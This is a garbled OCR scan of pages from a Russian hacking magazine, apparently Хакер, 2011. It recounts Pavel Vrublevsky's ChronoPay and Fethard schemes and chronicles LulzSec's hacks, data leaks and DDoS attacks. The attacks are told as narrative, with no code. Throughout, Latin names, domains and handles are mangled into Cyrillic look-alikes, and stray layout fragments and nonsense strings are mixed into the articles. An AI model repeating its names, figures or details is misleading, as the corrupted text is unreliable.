Рони Бирнаерта [Копт!е Веегпаег®, одного из 
средненьких адверов Рогпосг\о СазВ. Так9 
лет назад появился знаменитый процессинг 
СВгопорау. 


1 


казана, 
ке 


Марка Геага 2008 


ным административным ресурсом. В систе- 
ме Ге{ага.617 он видел две вещи: 

1. Достаточно крупные суммы оборотных 
средств; 

2. Полную нелегальность системы как 
таковой. 

В итоге, 12 сентября 2007 года появил- 
ся самый известный топик о системе 
Ее{Вага.617 на Сгщор.пи под названием 
«Суппорт Фета — временные траблы». 
Топик имел 3295 комментариев и 440 000 
просмотров: это самый популярный топик 
за всю историю Сг\ор.пи. Итак, 12 сентя- 
бря 2007 года остановились все операции 
с выводом средств из системы Гаага. 
67. Перестали зачисляться входящие 
банковские платежи. Продолжали рабо- 
тать лишь внутренние переводы, которые 
исполнялись автоматически. КедЕуе объ- 
яснил это временными траблами саппор- 
та Фета на «один-два дня». Эти «один- 
два дня» длятся уже более четырех лет и 
точно войдут книгу рекордов, как самые 
длинные «один-два дня» в истории. 

Так что же случилось с Геага’ом? 
Официальная версия произошедшего была 
такова: к собственнику здания, где сидели 
операционисты и саппорт Ее ага, пришли 
«оборотни в погонах» из ОБНП УВД СВАО 
(отдел по борьбе с налоговыми преступле- 


2003 


Система Ее Вага 


Ге ага — это интернет-банк, в котором 
можно было открыть виртуальный счет с воз- 
можностью получения на него безналичных 
платежей из любого банка мира. Это было 
очень похоже на любой сазВ ощ-сервис: 
мгновенное «оформление» банковского счета 
для получения денег в разных валютах и 
быстрый вывод полученных средств удобным 
способом. Начав сотрудничество с рекламы 


на форуме Сгитор.пи, через год Павел уже 
стал официальным партнером системы. 


› 079 


Мел ВЕР 

Байка Вани и бинт пит 

Копи Дкожитою ЯЗ 

идеях АМК МЕ — 
их Борода — Ратривит гищ 
ай АШап М — 
Толстой Лев — Ра зраыеяотььяы 

= бое МЕ 

Зайкны Роман = "пика Гомера 
гл Мг. —+ 


та 


лапа ау 
тая Ма М 


АХ Реотовои 
Нерриег ПА! 


прет В 


фарния . — 


Сердце Спгопорау — внутренний корпоративный ресурс 


ниями)}, которые произвели обыск, выемку 
документов и унесли сейф, в котором 
находились учредительные документы на 
фирмы-офшоры, на чьих банковских счетах 
аккумулировались все оборотные средства 
системы, а также Р!М-калькуляторы (диги- 
пассы)] для доступа к счетам этих фирм. 
Соответственно, оставшись без доступа 

к банковским счетам, вся деятельность 
Ге{Вага остановилась. Когда через пару 
недель были восстановлены доступы к 
счетам фирм-офшоров, оказалось, что со 
многих из этих счетов пропали деньги. 
Точную сумму украденных денег знает очень 
ограниченное число людей. Кей Еуе на фору- 
ме говорил о сумме в $6 000 000. Как только 
стало ясно [примерно в середине октября 
2007 года}, что без оборотных средств нала- 


2004-2006 


Счастливое время 


Середина нулевых — время расцвета всех 
проектов Павла. ЕеРВага рос по 200% в год, 
СВгопорау включился в процессинг разных 
ав г5К-направлений вроде фармы, зрумаге, 
сигарет и форекс. В конце 2006 года Павел 
выкупил долю основателей Еепага.617 и стал 
единоличным владельцем сервиса. 
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дить работу системы не получится, было 
принято решение о заморозке всех средств 
на счетах клиентов. Начались пламенные 
клятвы от КедЕуе'а, что это временно, толь- 
ко лишь на год, который как воздух нужен 
на восстановление системы. Были даны 
обещания покрыть все издержки за счет 
средств других бизнесов и много еще чего. 
Планировалось, что 12 сентября 2008 года 
всем будет счастье. С того времени ничего 
не изменилось, и деньги клиентам так никто 
не вернул. Единственный факт — Павел 
Олегович стал намного богаче :. 


рр кое — 


Есть целый ряд весомых оснований счи- 
тать это не вопросом, а утверждением. 


2007 


Закрытие ЕеФага 


12 сентября 2007 года остановились все опе- 


рации с выводом средств из системы Ееага. 


1х, замороженными оказались миллионы 
долларов. Павел объяснил это временны- 
ми траблами на 1-2 дня — в итоге эти «1-2 
дня» тянутся уже больше 4 лет. По версии 
КедЕуе, «оборотни в погонах» из ОБНП УВД 
СВАО вынесли из его офиса сейф с РИМ- 
калькуляторами для доступа к счетам его 
офшорных фирм. Как он утверждал, в итоге у 
него увели больше 6 миллионов долларов. 


Проект ПО АВ 


Стопыпин Петр 


нерест» Г = 


еп! гг — 


Мёд Дынтрий — 


Вам Мг — 


Купитан Немо -+ 


ТетрРыг Ме — 


Рыче =! | 


агифа ле М. + 


Это очевидно всем, кто потратит хотя бы 
30 минут на изучение сайта \млл/м..гедеуе- 
6049.согп, где опубликован ряд докумен- 
тов, наглядно показывающих связь между 


Павлом Олеговичем, ником КедЕуе, 
Фетхардом и другими проектами. 
Подтверждают теорию и невнятное 
мычание самого Павла на прямые вопро- 
сы, например, в 76 выпуске подкаста 
Рунетология — БИ у/ец0ОНЕ. 

Еще одно занятное совпадение было обна- 
ружено Брайном Кребсом. Одно время на 
главной странице сайта спгопорау.согт 
висел счетчик бооц(е Апайс$. Потом его 
сняли, так как Кребс заметил, что тот же 

|0 счетчика используется на сайтах порно- 
партнерок, принадлежащих КедЕуе: сазВ. 
рогпосгико.ез и еи-сазй.сот. После 


2008 


Оформленный кидок 


Официально КедЕуе взял год на решение про- 
блем «Фетхарда»: было обещано, что 12 сентя- 
бря 2008 года система вновь начнет работать, и 
замороженные средства можно будет вывести. 
На деле все опять закончилось обманом, 
ничего не поменялось и за следующие годы. 

В общей сложности пользователи Е& Вага по- 
теряли на этом 19 миллионов долларов. 
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\Месоте тю Кизча! 


эпопеи с угнанным доменом по чьему-то 
«недосмотру» [Назовем это так) этот счетчик 
опять появился на главной странице. 


Сргопорау 


Теперь речь пойдет о компании ЗАО 
«ХроноПэй» (млм. сВгопорау.ги], которая 
наследует традиции уже знакомой нам ком- 
пании СНКОМОРАУ В.\. из Нидерландов. 
Нужно отдать Павлу должное: он сумел 
построить неплохой бизнес с более чем 
сотней сотрудников, офисом в центре 
Москвы и рядом крупных клиентов калибра 
«Мосэнерго», «МТС» и «Ростелеком». 

Но сейчас можно смело судить о том, 

что белый процессинг как таковой был 
нужен Павлу лишь для того, чтобы было 


2009 


Партнерка Кх-Ргото{оп 


Партнерская программа по продаже различной 
фармакологической продукции (наркотики, 
сексуальные стимуляторы ит.д.] — важная веха 
в карьере Павла. Это был целый конвейер по 
продаже таблеток: генераторы новых магази- 
нов, десятки готовых вариантов дизайна, мгно- 
венно прикручиваемый процессинг. Масштаб 
бизнеса был соответствующий: Павел даже ор- 
ганизовывал вечеринки для своих партнеров 

и проводил конкурсы в стиле «продай больше 
всех таблеток и выиграй Наг{еу Пама5оп». 
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_ -"Месоте Атейсап Сотгафез! 
\Ме'ге сошигу мИВ побеги есопоту 
\ию Я9$ адатз{ Зрат 


апа Соггирвоп,"! 


куда подмешивать Пай г!5К-процессинг 
с партнерок и личных серых проектов: 
фарма, эрум/аге, сигареты, форекс и т.д. 
Достаточно занимательные факты опу- 
бликованы на сайте млмм/.гедеуе-65{о9.согп: 
если империя Павла тебя заинтересова- 
ла, то советую тебе обратиться к этому 
сайту. Там опубликованы весьма любо- 
пытные документы, аудиозаписи, утекшие 


письма, статистика и все остальное, что 
связано с личностью Павла Врублевского. 


К успеху шел 


В целом, наша история уже подходит к 
своему логическому завершению. 
Двенадцатого июля по подозрению в орга- 
низации ООо5-атаки на серверы платежной 


2010 


«Взлом» спгопорау.сот 


На сайте «Хронопэя» опубликовано феериче- 
ское сообщение: «Мы с сожалением вынуж- 
дены сообщить, что в период 25-26 декабря 
2010 года в нашей компании произошел взлом 
базы данных, приведший к полной утечке всех 
имеющихся персональных данных пользова- 
телей «Хронопэй» за 2009-2010 годы, включая 
полные номера кредитных карти с\\-кодов». 
Как выяснилось, кто-то увел домену регистра- 
тора и смогзаменить М№5-записи домена. 


Главные проекты 
Павла Врублевского 


® Форум сгиор.пи 
® Партнерская программа Рогпосг\о СазВ 


® Платежная система СИгопорау 
® Финансовая система Ге{Вага 
® Фарм-партнерка Кх-РгоптоНоп 


системы «Ассист» (конкурент СВгопорау] 
был арестован один из ближайших сорат- 
ников Павла Олеговича — хакер Епде(, 

в миру известный как Игорь Артимович. 
Энгель довольно быстро написал чистосер- 
дечное признание, сдав и своего родного 
брата, и самого Врублевского, как заказчи- 
ка данного преступления. КедЕуе же счел 
за благо покинуть пределы родины, укрыв- 
шись на Мальдивах. Тем не менее (под 
влиянием своего адвоката и из-за риска 
депортации в США], Паша решил вернуть- 
ся в Россию. Двадцать третьего июля он 
был задержан в аэропорту Шеремьтьево. 
Сейчас он пребывает в СИЗО, где дожида- 
ется окончания следственных мероприя- 
тий и судебного разбирательства. Павел 
Олегович гениален: на протяжении трех 
лет ему удавалось водить за нос правоо- 
хранительные органы, красивыми речами 
пудря мозги высокому руководству и зано- 
ся деньги рядовым сотрудникам. Стоит 
отдать ему должное — в СК МВД РФ ему 
удалось четыре (!} раза закрыть возбуж- 
денное против него уголовное дело, рас- 
следование которого, однако, всякий раз 
возобновлялось. А вот сотрудники ЦИБ 
ФСБ оказались неподкупнее милицейских 
следователей и накрыли всю банду, при- 
частную к совершению таких громких пре- 
ступлений последнего времени, как атака 
на Мас-пользователей с помощью лже- 
антивируса Мас Ое!епдег, ОПо5-атаки на 
ЖЖ Алексея Навального, международная 
торговля наркотическими препаратами 
через систему КХ-Рготойоп и многих дру- 
гих. Удивительно, но О0о5 крайне нега- 
тивно влияет на карму! == 


2011 


Закат эпохи 


Стоит отдать Врублевскому должное — занося в 
СК МВДРОФ, емуудалось четыре ('!] раза закрыть 
возбужденное против него уголовное дело. Но 
00о5-атака на компанию «Ассист» (конкурента 
Сргопорау] и две недели простоя онлайн- 
платежей у «Аэрофлота» — это уже Павел 
перегнул палку. 25 июня КедЕуе был задержан в 
аэропорту Шереметьево и в настоящий момент 
находится под арестом до октября, когда долж- 
но начаться судебное разбирательство. 
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Ш м Мария «МИг((» Нефедова, (тИгИЦ@геа(.хаКер.ги) 


БУГАГАШЕЧКИ 


Хроника 
деяний 
[11 25ес 


©В жаркие летние месяцы на просторах Сети развернулась не менее 
жаркая борьба — «бобра с ослом». Хакерская группа [и(7 зесигку су- 
мела поставить на уши всех: телевизионщиков, военных, крупные 
|Т-компании. Первоначально эти парни осуществляли атаки, по их 
собственному признанию, «ог [и[7», то есть — просто прикола и сме- 
ха ради. Но в конечном счете все оказалось не так просто. 


Ржем над вашей 
безопасностью с 201 года 


Не так давно СМИ всего мира вытащили на свет и, отряхнув от 
пыли, принялись использовать термин «хактивист», родившийся 
в результате слияния двух слов «хакер» + «активист». На самом 
деле, в последнее время заурядным дефейсам и взломам ради 
наживы пришлось потесниться, освобождая место хакерам с 
идеологией. 

Внезапно оказалось, что эдаких «кибертеррористов» в мире 
сотни и тысячи, они готовы отстаивать то, что считают правиль- 
ным, готовы сражаться с корпорациями и правительствами, и 
берут, если не умением, то количеством. Самый яркий пример 
последних лет — Анонимусы, коих легион, и которые чинят в 
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Сети всевозможные непотребства. Однако, не Аноном единым... 
Просуществовавшая всего пару месяцев хак-группа [и{7 Зесигиу, 
сумела наделать столько шума и добиться таких результатов, что 
просто диву даешься. Мы посчитали, что хроника взломов, осу- 
ществленных этими ребятами, заслуживает отдельного рассказа. 
Впервые широкая публика услышала о группе 1и{7 Зесигиу 
(далее также [и{25ес или 1и{2 Воа{ — «корабль лулзов»] в мае 
текущего года. Все началось с «телевизионных» взломов, доста- 
точно заурядных и не особенно громких — сообщения о таких 
легко пропустить, читая новости. 

Первым пострадало телешоу Х-Еа<{ог — очередная передача, 
где ищут таланты, аналог Атегсап [40[ и Вг(цап'5 Сбой Таепе. 
Хакеры благополучно увели у телевизионщиков личные данные 


ХАКЕР 09 /152/ 2011 


о 250 тысячах кандидатов на участие в шоу, самому младшему 
из которых было всего 12 лет. Имена, даты рождения, телефон- 
ные номера, адреса ета( — утекло все. На официальном сайте 
[и 25ес ((хзесигЦу.сого] открылся и стал наполняться раздел 
«Кееа$е$», где абсолютно открыто, для всех желающих было 
выложенное все вышеперечисленное. Базы данных доступны в 
формате $О1, {х{, есть также ссылки на торрент. 
Хакеры, разумеется, официально взяли ответственность за 
взлом на себя и объявили о том, что это только начало. Цитата 
из их первого заявления: 
«Мы Ги; 5ес, небольшая команда веселых индивидов, кото- 
рые считают, что серость мирового киберкомьюнити мешает 
ему осуществлять самое главное в жизни: веселиться. 
Все веселье в наши дни ограничивается ожиданием пятни- 
цы, ожиданием выходных, затем следующих выходных, и мы 
поставили перед собой задачу распространить веселье на 
весь остальной календарь, чтобы оно длилось круглый год». 
В конце заявления также была ссылка на официальный 
«Твиттер» команды: {м Щегсогт/ и 5ес. 
Новость об утечке данных будущих участников шоу талантов 
вызвала в Сети и СМИ довольно вялый отклик, можно сказать, 
что она прошла незамеченной. Однако следующий взлом от 
[4(25ес не заставил себя ждать, и удар вновь был нанесен по 
телевизионщикам из компании Рох. Через три дня после первой 
атаки жертвой стала ГКох Вгоайсаз$Ипа. Проникнув на сервер, хаке- 
ры заполучили в свои руки сотни логинов и паролей от почтовых 
ящиков сотрудников, добрались до их личных аккаунтов в соци- 
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Тупак жив! 


альных сетях и вновь выложили все узнанное в открытый доступ. 
На этот раз утечка сопровождалась текстом, который был 
озаглавлен «Официальное уведомление справедливости от 

[и 75ес». В уведомлении хакеры сообщали Гох, что сильно их не 
любят (правильно, за что любить людей, закрывших Е!геНу?} и 
предлагали Гох поцеловать себя в задницу. 


Лого АпйФес, полученное в ходе слияния символики Анонимуса и Ци25ес 
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«Все ваши базы теперь наши». Картинка со взломанного РВ$ 


Этот инцидент привлек уже больше внимания, люди принялись 
активно фоловить [и[2 Воа{ в «Твиттере», от хакеров стали ждать 
следующего шага. И шаг воспоследовал. 

За последние полгода многострадальную компанию 5опу не пнул, 
похоже, только ленивый. [и[#5ес решили не оставаться в стороне 
и поучаствовали в поутихшем было веселье. На сайте ЗопуМи5гс. 
сор обнаружились дырки в 5ОЕ, некоторыми из которых взломщи- 
ки воспользовались сами, выложив в открытый доступ очередную 
базу данных, а на некоторые они просто указали в своем послании, 
предложив поразвлечься другим. Этот взлом [и75ес прокоммен- 
тировали весьма лаконично: «Это никакой не 1337 В4х0г, просто 
мы хотим еще чуть-чуть опозорить 5опу. Будем считать этот взлом 
номером 87 Ну хотя бы 7 с половиной?!». 

В результате этой атаки, также как и в случае с атаками предыду- 
щими, пострадала в основном честь и репутация компании (хотя 
в случае с бопу, куда уж дальше]. 

Взломы взломами, но [их 5есигцу не строили из себя \\\К|еаК$ 
и не позволяли себе никаких утечек по-настоящему секретных 
данных, не чинили никаких финансовых преступлений, не про- 
изводили никакой умышленной порчи данных на серверах. 
Именно из-за такого своеобразного почерка многие аналитики 

и журналисты приравняли веселых хакеров к дгау Ва* (серым 
шляпам] и сетевым пранкерам, но никак не к реальным кибер- 
террористам. Нашлись даже те, кто открыто поддержал 1 и75ес, 
называя их деятельность нужной. Однако невинными шалости 
хак-группировки оставались недолго. 


[417 Воа{ отправляется в плавание 


Конец мая ознаменовался последним относительно несерьезным 
хаком от «Лулзов». Используя Одау-эксплоит для Моуеа Це Туре, 
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а также прогу Нам 1.14 Рго [для 5@-инъекций), группа добра- 
лась до сайта Службы общественного вещания (РВ$}. Сайт был 
взломан и подвергся дефейсу. Со страниц РВ$ Мем/зНоиг хакеры 
сообщили миру, что Тупак Шакур жив и все последние 15 лет 
после своего предполагаемого убийства находился в Новой 


Зеландии. Тем временем редакторская группа РВ$ активно 
отрицала правдивость этой истории в Т\/Щег и пыталась убедить 
общественность, что это всего лишь фейк и взлом. 

Взлом, как уже было сказано выше, был осуществлен благодаря 
Одау-уязвимости, эксплуатируя которую, Ни[2$ес загрузили рПр- 
шелл на Ир, а затем внедрились на сервер, используя эксплоит для 
получения локального рута для ядра 27 2.4.21-37.ЕЁгпр 2005 1686. 
Одним дефейсом дело, впрочем, не ограничилось. Хакеры также 
разместили на сайте рисунок с надписью «АЦ усиг Базе аге 
Бе[опд То [1и(25ес» («Все ваши базы принадлежат [1и(75ес»), шут- 
ливый, но намекающий на то, что они скопировали и все $(| - 
базы с сервера. 

На официальном сайте команды вскоре действительно появи- 
лись различные БД, добытые через взлом РВ. Среди них был 
список всех БД на сервере, база данных авторов издания, база 
пресс-рум пользователей, МуъОЁ-база юзеров сайта и так далее. 
И, как ни странно, этот взлом стал первой атакой, носившей 
политическую подоплеку. В «Гвиттере» [и175ес написали: «Мы 
только что посмотрели фильм РВ$ о \/КЦеакК$, и он нам не 
понравился». Документальную ленту под названием «Егог“Ите: 
М К!<есге{» на РВ$ показали за неделю до взлома. Фильм рас- 
сказывает о Джулиане Ассанже и Брэдли Мэннинге, приводятся 
интервью с родными рядового, обвиняемого в разглашении 
секретной информации. Взлом сайта, кстати, совпал с годовщи- 
ной ареста Мэннинга. 
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Также хакеры традиционно сопроводили украденные материалы 
более развернутым посланием: 
«Приветствуем вас. Мы только что посмотрели \/1К!5есге{5, 
и нас не очень-то впечатлило. Мы решили пришвартовать 
наш корабль с лулзами к серверам РВ$, дабы... разо- 
браться. На момент прочтения этой записи вы уже должны 
знать, что даже офигенная крепость из третьих «Пиратов 
Карибского моря» (первая часть была лучше!) не способна 
выстоять под напором хаоса и наших лулзов. Ладно, оста- 
вим размышления о сиквелах... хотя, постойте: вторая и 
третья части «Матрицы» тоже полная хрень! 
В общем, народ, поздоровайтесь с содержимым серверов 
РВ$. В следующий раз РВ$ стоит внимательнее смотреть, 
куда они плывут». 
Одновременно с этими событиями СМИ предприняли попытку 
связать [и175ес с Анонимусами, называя |и175ес подразделе- 
нием последних. В ответ на это хакеры обиделись и в своем 
«Твиттере» написали: «Мы не Анонимус». Однако не прошло 
и пары недель, как группы объединились, чтобы ломать уже 
не только лулзов ради. Впрочем, мы забегаем вперед, об этом 
немного ниже. 
Сообщив миру, что Тупак жив, корабль лулзов взял новый курс. 
Видимо посчитав, что одной атаки на $опу было недостаточно, 
[и 75ес нанесли компании второй, куда более серьезный удар. 
Этот инцидент, пожалуй, стал наиболее смачным фэйлом 5опу 
после взлома Р\ау$айоп Ме\могк. 
«Почему ты возлагаешь такие надежды на компанию, которая 
позволяет себе быть открытой для таких простых атак?», — 
спрашивали хакеры у сетевой общественности. А взлом, в 
самом деле, получился куда масштабнее первого. И вместе с тем 
проще. Снова цитируем официальный комментарий [и75$ес: 
«Мы достали 5опуР!{иге$.сот при помощи простой 591 - 
инъекции, одной из наиболее примитивных и распро- 
страненных уязвимостей, что всем прекрасно известно. 
Посредством этого элементарного внедрения мы получили 
доступ ко ВСЕЙ информации!.. Нам удалось скомпромети- 
ровать более миллиона пользователей. У нас все их личные 
данные, включая пароли, ета(-адреса, домашние адреса, 
даты рождения, а также все данные об операциях, произ- 
веденных с их аккаунтов. Кроме того, у нас есть вся админ- 
ская информация о 5опу Рус{иге$ (включая пароли), более 
75 000 «музыкальных кодов» и более 3,5 млн «музыкаль- 
ных купонов». 
Как ты понимаешь, [и[75ес отнюдь не были голословны — все 
перечисленные данные опять были обнародованы на официаль- 
ном сайте. На момент написания этой статьи вся информация 
по-прежнему доступна и на сайте, и в торрентах, и на множе- 
стве других ресурсов Сети, так как остановить распространение 
подобной утечки практически невозможно. 
Очередной позор 5опу еще не успел сойти с первых полос всех 
[‘шных изданий мира, а 1и[2$ес уже работали над другими 
целями. Прошла всего неделя с момента взлома японского 
гиганта, и хакеры начали окончательно переквалифицироваться 
в хактивистов. Если раньше [и[7$ес забавлялись и, по боль- 
шому счету, лишь указывали компаниям и специалистам на 
бреши в системах безопасности [при этом немало веселя обще- 
ственность}, то последующие хаки стали злее, и они уже имели 
определенную цель. 
Первым пострадал подрядчик ФБР — фирма [п1гаСага. Эта 
атака, в отличие от предыдущих, являлась актом возмездия и 
недовольства, последовавшими в ответ на слова представи- 
телей НАТО и президента США Барака Обамы. В начале июня 
Обама и НАТО заявили, что хакерство в их глазах приравнивает- 
ся к военным действиям. 


В результате взлома ресурса пгадагдаЦап“а.ога 1и[75ес уда- 
лось заполучить порядка 180 логинов, так или иначе связанных 
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Живописная иллюстрация к акции Сптода Та ппога 


с ФБР. Более того, хакеры обнаружили, что Карим Хиджази 
(генеральный директор компании УпуеЦапсе, занимающейся 
сетевой безопасностью] использовал один тот же пароль для 
|п7гадага и для личного и рабочего почтовых ящиков. Благодаря 
этой оплошности |-и[75ес добрались до персональной перепи- 
ски Хиджази, до почты его компании и временно перехватили 
управление ботнетом, над которым ЧпуеЩапсе работала. Также 
хакеры с сарказмом сообщили, что Хиджази предлагал им день- 
ги, пытаясь откупиться. 

Он не хотел, чтобы информация о его некомпетентности стала 
достоянием общественности и предлагал 1 и[75ес атаковать 
вместо УпуеЩапсе его коллег. Хиджази даже предложил хаке- 
рам помощь и обещал организовать некий «инсайд». Стоит ли 
говорить, что [и[75ес денег не взяли, зато обнародовали всю 
переписку, логи и прочую подноготную горе-безопасника и его 
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компании? Занимательное чтиво также доступно на сайте [17 


бесигКу. Эту акцию группировка лаконично озаглавила как 
«Гиск ЕВ! Ейдау». 

На следующий день, очевидно, в качестве небольшой разрядки 
после таких серьезных дел, [и[7$ес мимоходом хакнули Мищепдо. 
В данном случае все было более или менее гуманно (насколько 
гуманным вообще может быть взлом}. Никакие личные данные 
клиентов или компании не были скомпрометированы, [1 и[75ес 
просто вторглись на сервер, покопались там и выложили на 

[4 й5есигНу.сога конфиги сайта пи{епдо.согт. 

Еще через день группировка опять легонько пнула компанию 
5опу, теперь похитив исходники 5опу Сотрщег Еещаттепе 


Оеуеюрег МемогкК. Однако этот эпизод быстро забылся и канул 
в анналы истории, потому что за ним последовали хаки, которые 
шалостями уже не назовешь. 


А теперь серьезно. АпИ5ес 


Превращение развеселых хакеров в хактивистов окончательно 
завершилось после того, как 13-го июня они заявили о взломе 
внутренней сети Сената США. 
Снова цитируем самих хакеров: 
«Приветствуем вас, друзья. Нам очень не нравится амери- 
канское правительство. 
У них слабые корабли, несмешные шутки, а их сайты плохо 
защищены. 
Мы попытались помочь им справиться с этими проблема- 
ми, поимев их еще разок и поделившись с ними своими 
лулзами. Для разогрева мы приводим небольшую порцию 
внутренних данных с 5епа{е.до\у. Это военные действия, 
господа? Какие-то проблемы?». 
По информации Кещег$, представитель Сената подтвердил, что 
атака на внутреннюю сеть Сената действительно имела место и 
добавил, что служба компьютерной безопасности американского 
конгресса проводит расследование инцидента. 
За этим неприличным жестом в сторону американских властей 
вновь последовал ряд менее опасных и более забавных атак. 
[и Воа{ бросил якорь на порносайте Ргоп.сого, в итоге опубли- 
ковав 26 000 почтовых адресов и паролей, принадлежавших его 
пользователям. Хакеры призвали сетевой люд искать совпадаю- 
щие учетные данные и использовать их для входа в Гасероок и 
другие социальные сети. 
Впрочем, повеселиться толком не удалось, ведь крупнейшая 
социальная сеть планеты быстро отреагировала на эти заяв- 
ления, сопоставив просочившиеся в интернет етаЦ-адреса со 
своей базой данных, и сбросила пароли этих юзеров. Кстати, 
некоторые источники уверяют, что среди 26 тысяч «счастливчи- 
ков» оказались деятели из правительства и вооруженных сил, 
которых постигли серьезные неприятности. 
В качестве вишенки на торте |1 и{75ес также обнародовали дан- 
ные о 55 руководителях других сайтов для взрослых. 
Потом хакеры обратили свой взор на игровую индустрию в 
целом и на компанию Вефе$Ча Зо И\м/огК$ и ее подразделение 
Геп!Мах Меча в частности. 
За что досталось создателям «Морровинда» не совсем ясно, 
скорее всего, в ход пошла логика, подобная логике Кевина 
Митника: «потому что можем». Тем не менее, факт остается фак- 
том: [и{[75ес украли и опубликовали множество етаЦ-адресов, 
добытых в официальном блоге компании, на сайте игры ВЕМК, 
а также на внутреннем портале для поиска работы. Кроме того, 
группировка непрозрачно намекнула, что также заполучила на 
руки данные о 200 000 игроков ВКИМК и исходники Сиаке 4. 
Обнародовать эту информацию [и{75ес не стали, ссылаясь на то, 
что якобы любят компанию Ве{!езда. Какой-то странною любо- 
вью, должны сказать мы. 
Геймеры, над которыми из-за проделок хакеров нависла угроза 
утечки личных данных, разумеется, недовольно зароптали. То ли 
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это позабавило [и{75ес, то ли план хакеров с самого начала был 
таков... Словом, не прошло и двух дней, как под шквалом лул- 
зов умерли сервера популярнейших игр — Е\Е ОпИпе, Езсар!<{ 
Мада7те, МтесгаЁ и 1еадие от 1едепа$. Комментарий [и75ес 
на этот счет был краток, как никогда: 

«Мы сделали это, потому что они не могли остановить нас». 
И, переходя на совсем уже толстый троллинг, хакеры опублико- 
вали номер телефона горячей линии, по которому можно обра- 
титься и предложить следующую мишень. Звонившие по этому 
американскому номеру слышали сообщение некоего Пьера 
Дюбуа, который говорил с сильным французским акцентом. 

От такого поворота событий у геймеров и вовсе приключилась 
натуральная истерика. На 4сВап в незабвенном /6/ собралось 
форменное ополчение, жаждущее покарать [Г и[7$ес, сдать их 
всех ФБР, линчевать, покарать, сжечь и съесть. Неважно, в 
какой последовательности. Призывы «если что-то о них знаете, 
позвоните в ФБР, мать вашу!» звучали громко. Интернет уже 
принялся запасаться попкорном, предвкушая эпическое про- 
тивостояние Анонимуса с [и|75ес, однако все закончилось, не 
успев начаться. Федералам, надо думать, так никто не позвонил, 
зато [и|75ес и Анонимус в скором времени объединились в еди- 
ном хактивистском порыве, объявив о начале операции АпИЗес. 
В преддверии АпИбес, кстати, имел место еще один хак. 

[1 и75ес решили не ограничиваться Сенатом и «пощупали» сайт 
Центрального разведывательного управления. Ничего серьез- 
ного с с'а.до\ не случилось, однако сайт ненадолго вышел из 
строя. Причастность 1 и[75$ес к этому инциденту задокументиро- 
вана в их «Твиттере»: «Танго сбит — с!а.доу — ради лулзов». 
Теперь вернемся к АпИ5ес. Стоит сказать, что движение с ана- 
логичным названием уже существовало в конце 90-х годов. 
Тогда хакеры под этим именем боролись с индустрией компью- 
терной безопасности, выражая свое несогласие с политикой 
полного раскрытия информации. Нынешняя операция АпИ5ес, 
в свою очередь, была направлена против банков, корпораций, 
правительств и правительственных агентств, а также в целом 
против цензуры и контроля в Сети. 

Начало сотрудничества Анонимуса и [и[75ес ознаменовалось 
падением сайта британского агентства по борьбе с организован- 
ной преступностью. Судя по всему, в ход пошел обыкновенный 
0005, из-за которого сайт не работал полдня. О причастности 
[и Зесигцку стало известно опять же благодаря «Твиттеру»: 
«Танго сбит — {.со//)6с]909 — во имя #АпИ5ес», — написали 
хакеры. 

Следующей мишенью стали сайты властей Бразилии, а именно 
сайт президента — ргез!Чепс!а.доу.6г, правительства — Бгазц. 
до\.6г и казначейства. Очередное сообщение «Танго сбит» в 
ТмлКег, нарушенная работа сайтов и, позже, заявление пресс- 
службы президента о том, что атака была успешно отбита, и 


никакими данными хакерам завладеть не удалось. Не трудно 
придти к выводу, что это опять был 0005. 

Зато атака на Департамент общественной безопасности штата 
Аризона удалась на славу. Выражая протест против закона 
581070, который действует в Аризоне, и который представители 
[4 (75ес считают расистским и нарушающим права иммигрантов, 
хакеры вторглись на полицейские сервера. 

Эту операцию они назвали «СЬ!пда (а пидга», что примерно 
переводится как «На хрен пограничные патрули». Ни[7$ес раз- 
жились немалым количеством ета(-адресов, паролей и доку- 
ментов разной степени секретности. Разумеется, все традицион- 
но было выложено в Сеть. 


Посмеялись и хватит 


Несмотря на то, что у [и!75ес были большие планы, о которых 
они не стеснялись писать в «Твиттере» и не только, неожиданно 
наступила развязка. 

В 20-х числах июня СМИ сообщили о том, что в Великобритании, 
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в Уикфорде (графство Эссекс) был арестован подозреваемый в 
причастности к атакам [и[7$ес. Его имя Райан Клири и извест- 
но, что парню всего 19 лет. Казалось бы, [и[75ес лишь посмея- 
лись над этой новостью: 
«Похоже, прославленный лидер 1ч[75ес арестован, все кон- 
чено... хотя... нет, погодите, мы все еще здесь! Какого же 
несчастного они замели?». 
Однако спустя несколько дней, 26-го июня, хак-группа внезапно 
объявила о прекращении деятельности и уходе со сцены. 
«Наш запланированный 50-дневный круиз закончился, наста- 
ло время сказать: «В добрый путь!». Мы вынуждены уплыть 
вдаль, оставляя за собой — как мы надеемся — воодушевле- 
ние, страх, неприязнь, неодобрение, насмешки, неловкость, 
внимание, зависть, ненависть и даже любовь. Мы надеемся, 
помимо всего прочего, что мы хоть каким-то ничтожным обра- 
зом на кого-то повлияли», — сообщали хакеры, и все это подо- 
зрительно походило на хорошую мину при плохой игре. 
В прощальном послании [и{75ес также упомянули, что их было 
всего шестеро, и «за развеселой гримасой с радугами и цилин- 
драми мы — обычные люди». Также, что было вполне ожидаемо, 
[и 75ес выразили большую веру в будущее движения АпИ5ес, 
которое, по их мнению, должно продолжать жить, которое нужно 
нести в массы и распространять в Сети как можно дальше. 
На прощание [1 и[75ес выложили на сайт и целую пачку различ- 
ных данных. Мы просто приведем список: 


АО щегпа| даа. {ж 

АТ&Т ищегпа!/ дака.гаг 

Ва {еНе(9 Негоез Веа [550К изегз).с$\ 
ЕВ! Бето Щу.(ж 

НаскКЮгипп$.пе{ (200К изег$}.54( 
Ма{©-БооК$Вор.ога (12К изег$].с$\ 
Осе пе \могк$ оЁ согрогаЧоп$.{х{ 
Ргуа{е |пуезИда{ог Ета $. 4х 
Бапдом дапт!ипд огигппле [50К изег<}.{х1 
Щу гощег$. 1х1 

пауу. п омпед.рпд 


Вскоре после роспуска [и[25ес в «Твиттере» Анонимуса (@ 
Апопупочц$!РС) появилось сообщение: «Все члены (91 и!;5ес на 
борту». Гак ли это? Как знать. 

Кто они, эти шестеро, спросишь ты? Этим же вопросом уже 
третий месяц озадачены спецслужбы разных стран, компании, 
специализирующиеся на информационной безопасности, и не 
только они. 

Теорий много. Издание «ТВе биагЧ!ап» в июне даже опублико- 
вало и анализировало логи с |КС-канала #риге-еЩе, на основе 
которых в Сети выстроено множество догадок. Сами члены [и 
ЗесигКу подтвердили, что утечка логов действительно была, но 
заметили, что на означенном канале собирается лишь своео- 
бразная группа поддержки 1 и[75ес, не имеющая к команде 
прямого отношения. Хакеры особенно подчеркнули, что фигу- 
